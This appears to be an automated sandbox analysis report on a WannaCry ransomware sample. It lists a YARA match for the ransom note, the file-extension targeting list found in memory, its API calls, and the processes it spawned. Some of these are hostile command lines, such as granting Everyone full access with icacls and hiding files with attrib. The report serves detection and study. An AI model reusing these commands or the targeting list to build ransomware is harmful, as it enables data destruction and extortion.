Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: wBQInv.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: wBQInv.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: wBQInv.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1356687526.0000000000915000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1295244076.0000000000908000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3719819751.000000001000C000.00000004.00001000.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3709965146.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.edb.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.dotx.dotm.dot.docm.docb.jpg.jpeg.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.eml.msg.ost.pst.pptx.ppt.xlsx.xls.docx.doc%s\%d%s.WNCRYT%s%sTWANACRY!.WNCRY.WNCYR\\@WanaDecryptor@.bmp@WanaDecryptor@.exe.lnk@Please_Read_Me@.txt%s\%s...%s\*.dll.exe~SD@WanaDecryptor@.exeContent.IE5Temporary Internet Files This folder protects against ransomware. Modifying it will reduce protection\Local Settings\Temp\AppData\Local\Temp\Program Files (x86)\Program Files\WINDOWS\ProgramData\Intel$\CloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll

Source: classification engine

Classification label: mal100.rans.spre.troj.evad.winEXE@808/840@1/1

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

Code function: 2_2_0041119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

2_2_0041119F

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_10005540 GetDriveTypeW,InterlockedExchangeAdd,GetDiskFreeSpaceExW,Sleep,GetDiskFreeSpaceExW,Sleep,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,InterlockedExchange,GetDriveTypeW,

0_2_10005540

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_00401CE8

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_00401CE8 OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_00401CE8

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

File created: C:\Users\user\Desktop\b.wnry

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_03
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Mutant created: \Sessions\1\BaseNamedObjects\MsWinZonesCacheCounterMutexA
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6768

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

File created: C:\Users\user~1\AppData\Local\Temp\wBQInv.exe

Jump to behavior

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 36751721951490.bat

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs

Source: C:\Windows\System32\dllhost.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\taskdl.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_10-217

Source: unknown	Process created: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe "C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\AppData\Local\Temp\wBQInv.exe C:\Users\user~1\AppData\Local\Temp\wBQInv.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .
Source: C:\Windows\SysWOW64\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 36751721951490.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6768 -ip 6768
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 916
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\AppData\Local\Temp\wBQInv.exe C:\Users\user~1\AppData\Local\Temp\wBQInv.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 36751721951490.bat	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
